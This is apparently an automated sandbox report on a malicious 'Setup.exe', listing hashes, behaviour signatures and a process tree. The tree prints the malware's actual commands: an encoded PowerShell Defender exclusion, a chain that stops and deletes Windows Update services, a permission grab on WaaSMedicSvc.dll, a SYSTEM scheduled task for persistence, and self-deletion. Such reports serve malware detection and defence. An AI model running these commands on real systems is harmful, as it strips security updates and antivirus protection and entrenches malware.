General
Target: Setup.exe
Filesize: 4MB
Completed: 05-05-2022 01:14
Task: behavioral2
Score: 10/10
MD5: 62ed80f638e9551e1e59b4ea9341bccd
SHA1: 44196e8cb0f5774decf60e12215767f092c3c008
SHA256: c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf
SHA512: 56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad

Malware Config
Signatures 17

  • Modifies security service
    reg.exe

    TTPs

    Modify Registry, Modify Existing Service

    Reported IOCs

    description | ioc | process
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
  • Executes dropped EXE
    iexplor.exe, iexplore.exe

    Reported IOCs

    pid | process
    4712 | iexplor.exe
    4928 | iexplore.exe
  • Possible privilege escalation attempt
    takeown.exe, icacls.exe

    Reported IOCs

    pid | process
    2412 | takeown.exe
    3924 | icacls.exe
  • Stops running service(s)

    TTPs

    Modify Existing Service, Service Stop
  • Checks computer location settings
    iexplore.exe

    Description

    Looks up country code configured in the registry, likely geofence.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | iexplore.exe
  • Modifies file permissions
    takeown.exe, icacls.exe

    TTPs

    File Permissions Modification

    Reported IOCs

    pid | process
    2412 | takeown.exe
    3924 | icacls.exe
  • Checks whether UAC is enabled
    iexplore.exe

    TTPs

    System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | iexplore.exe
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flow | ioc
    25 | ip-api.com
  • Suspicious use of SetThreadContext
    iexplor.exe

    Reported IOCs

    description | pid | process | target process
    PID 4712 set thread context of 656 | 4712 | iexplor.exe | AppLaunch.exe
  • Drops file in Program Files directory
    iexplore.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe | iexplore.exe
    File created | C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe | iexplore.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid | process
    4268 | schtasks.exe
  • Modifies registry key
    reg.exe, reg.exe, reg.exe, reg.exe, reg.exe

    TTPs

    Modify Registry

    Reported IOCs

    pid | process
    2296 | reg.exe
    3200 | reg.exe
    1316 | reg.exe
    4048 | reg.exe
    4264 | reg.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe, iexplore.exe

    Reported IOCs

    pid | process
    3508 | powershell.exe
    3508 | powershell.exe
    4928 | iexplore.exe
  • Suspicious use of AdjustPrivilegeToken
    AppLaunch.exe, powershell.exe, iexplore.exe, takeown.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 656 | AppLaunch.exe
    Token: SeDebugPrivilege | 3508 | powershell.exe
    Token: SeDebugPrivilege | 4928 | iexplore.exe
    Token: SeTakeOwnershipPrivilege | 2412 | takeown.exe
  • Suspicious use of WriteProcessMemory
    Setup.exe, iexplor.exe, iexplore.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe

    Reported IOCs

    description | pid | process | target process
    PID 2540 wrote to memory of 4712 | 2540 | Setup.exe | iexplor.exe
    PID 2540 wrote to memory of 4712 | 2540 | Setup.exe | iexplor.exe
    PID 2540 wrote to memory of 4712 | 2540 | Setup.exe | iexplor.exe
    PID 4712 wrote to memory of 656 | 4712 | iexplor.exe | AppLaunch.exe
    PID 4712 wrote to memory of 656 | 4712 | iexplor.exe | AppLaunch.exe
    PID 4712 wrote to memory of 656 | 4712 | iexplor.exe | AppLaunch.exe
    PID 4712 wrote to memory of 656 | 4712 | iexplor.exe | AppLaunch.exe
    PID 4712 wrote to memory of 656 | 4712 | iexplor.exe | AppLaunch.exe
    PID 2540 wrote to memory of 4928 | 2540 | Setup.exe | iexplore.exe
    PID 2540 wrote to memory of 4928 | 2540 | Setup.exe | iexplore.exe
    PID 4928 wrote to memory of 3716 | 4928 | iexplore.exe | cmd.exe
    PID 4928 wrote to memory of 3716 | 4928 | iexplore.exe | cmd.exe
    PID 3716 wrote to memory of 3508 | 3716 | cmd.exe | powershell.exe
    PID 3716 wrote to memory of 3508 | 3716 | cmd.exe | powershell.exe
    PID 4928 wrote to memory of 1140 | 4928 | iexplore.exe | cmd.exe
    PID 4928 wrote to memory of 1140 | 4928 | iexplore.exe | cmd.exe
    PID 1140 wrote to memory of 468 | 1140 | cmd.exe | sc.exe
    PID 1140 wrote to memory of 468 | 1140 | cmd.exe | sc.exe
    PID 4928 wrote to memory of 3416 | 4928 | iexplore.exe | cmd.exe
    PID 4928 wrote to memory of 3416 | 4928 | iexplore.exe | cmd.exe
    PID 1140 wrote to memory of 3152 | 1140 | cmd.exe | sc.exe
    PID 1140 wrote to memory of 3152 | 1140 | cmd.exe | sc.exe
    PID 3416 wrote to memory of 4268 | 3416 | cmd.exe | schtasks.exe
    PID 3416 wrote to memory of 4268 | 3416 | cmd.exe | schtasks.exe
    PID 1140 wrote to memory of 4656 | 1140 | cmd.exe | sc.exe
    PID 1140 wrote to memory of 4656 | 1140 | cmd.exe | sc.exe
    PID 1140 wrote to memory of 1492 | 1140 | cmd.exe | sc.exe
    PID 1140 wrote to memory of 1492 | 1140 | cmd.exe | sc.exe
    PID 1140 wrote to memory of 928 | 1140 | cmd.exe | sc.exe
    PID 1140 wrote to memory of 928 | 1140 | cmd.exe | sc.exe
    PID 1140 wrote to memory of 4048 | 1140 | cmd.exe | reg.exe
    PID 1140 wrote to memory of 4048 | 1140 | cmd.exe | reg.exe
    PID 1140 wrote to memory of 4264 | 1140 | cmd.exe | reg.exe
    PID 1140 wrote to memory of 4264 | 1140 | cmd.exe | reg.exe
    PID 1140 wrote to memory of 2296 | 1140 | cmd.exe | reg.exe
    PID 1140 wrote to memory of 2296 | 1140 | cmd.exe | reg.exe
    PID 1140 wrote to memory of 3200 | 1140 | cmd.exe | reg.exe
    PID 1140 wrote to memory of 3200 | 1140 | cmd.exe | reg.exe
    PID 1140 wrote to memory of 1316 | 1140 | cmd.exe | reg.exe
    PID 1140 wrote to memory of 1316 | 1140 | cmd.exe | reg.exe
    PID 4928 wrote to memory of 4980 | 4928 | iexplore.exe | cmd.exe
    PID 4928 wrote to memory of 4980 | 4928 | iexplore.exe | cmd.exe
    PID 1140 wrote to memory of 2412 | 1140 | cmd.exe | takeown.exe
    PID 1140 wrote to memory of 2412 | 1140 | cmd.exe | takeown.exe
    PID 4928 wrote to memory of 4592 | 4928 | iexplore.exe | cmd.exe
    PID 4928 wrote to memory of 4592 | 4928 | iexplore.exe | cmd.exe
    PID 1140 wrote to memory of 3924 | 1140 | cmd.exe | icacls.exe
    PID 1140 wrote to memory of 3924 | 1140 | cmd.exe | icacls.exe
    PID 4980 wrote to memory of 4724 | 4980 | cmd.exe | schtasks.exe
    PID 4980 wrote to memory of 4724 | 4980 | cmd.exe | schtasks.exe
    PID 4592 wrote to memory of 3960 | 4592 | cmd.exe | choice.exe
    PID 4592 wrote to memory of 3960 | 4592 | cmd.exe | choice.exe
Processes 28
  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        Suspicious use of AdjustPrivilegeToken
        PID:656
    • C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      Executes dropped EXE
      Checks computer location settings
      Checks whether UAC is enabled
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4928
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
        Suspicious use of WriteProcessMemory
        PID:3716
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:3508
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:1140
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:468
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:3152
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:4656
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:1492
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:928
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          Modifies registry key
          PID:4048
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          Modifies registry key
          PID:4264
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          Modifies security service
          Modifies registry key
          PID:2296
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          Modifies registry key
          PID:3200
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          Modifies registry key
          PID:1316
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          Suspicious use of AdjustPrivilegeToken
          PID:2412
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:3924
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
        Suspicious use of WriteProcessMemory
        PID:3416
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
          Creates scheduled task(s)
          PID:4268
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "iexplore"
        Suspicious use of WriteProcessMemory
        PID:4980
        • C:\Windows\system32\schtasks.exe
          schtasks /run /tn "iexplore"
          PID:4724
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"
        Suspicious use of WriteProcessMemory
        PID:4592
        • C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 3
          PID:3960
  • C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
    "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
    PID:2888
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
      PID:1284
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
    PID:3660
Network
MITRE ATT&CK Matrix
  • Collection
  • Command and Control
  • Credential Access
  • Execution
  • Exfiltration
  • Impact
  • Initial Access
  • Lateral Movement
  • Privilege Escalation
Downloads